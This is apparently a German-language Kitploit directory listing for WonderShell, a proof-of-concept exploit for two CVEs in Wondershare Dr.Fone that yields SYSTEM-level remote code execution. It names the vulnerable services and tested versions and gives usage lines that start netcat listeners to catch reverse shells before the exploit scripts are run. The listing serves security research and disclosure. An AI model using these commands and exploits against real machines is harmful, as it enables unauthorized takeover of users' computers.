Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WonderShell — Proof-of-Concept-Exploit für CVE-2021-44595 und CVE-2021-44596 in Wondershare Dr.Fone, der Remote Code Execution mit SYSTEM-Rechten über verwundbare Dienste ermöglicht. | Kitploit
Tools/GitHubGitHub/netanelc305/wondershell
Privilege EscalationExploitationPenetrationstests
GitHubnetanelc305/wondershell

WonderShell

Proof-of-Concept-Exploit für CVE-2021-44595 und CVE-2021-44596 in Wondershare Dr.Fone, der Remote Code Execution mit SYSTEM-Rechten über verwundbare Dienste ermöglicht.

Repository anzeigen
32vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WonderShell - CVE - 2021-44595 | CVE - 2021-44596

Entdeckt von

Netanel Cohen und Tomer Peled, Sicherheitsforscher bei BugSec.

Beschreibung

POC-Beispiel zur Ausnutzung von Wondershare Dr.Fone.
Dr.Fone ist ein Telefon-Toolkit, das von Wondershare entwickelt wurde und anfällig für RCE ist.
Allein mit Netzwerkzugriff gelingt es uns, Remote-Code als SYSTEM-Benutzer auszuführen.

Anfällige Dienste:

InstallAssistService.exe
ElevationService.exe

Getestet auf Versionen: 12.0.7, 11.4

Verwendung

IP und Port ändern und ausführen.

root@kitploit:~
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
root@kitploit:~
nc -lvnp 1337
./InstallAssistServiceRCE.py

Publikationen

https://medium.com/@tomerp_77017/wondershell-a82372914f26

Tool herunterladen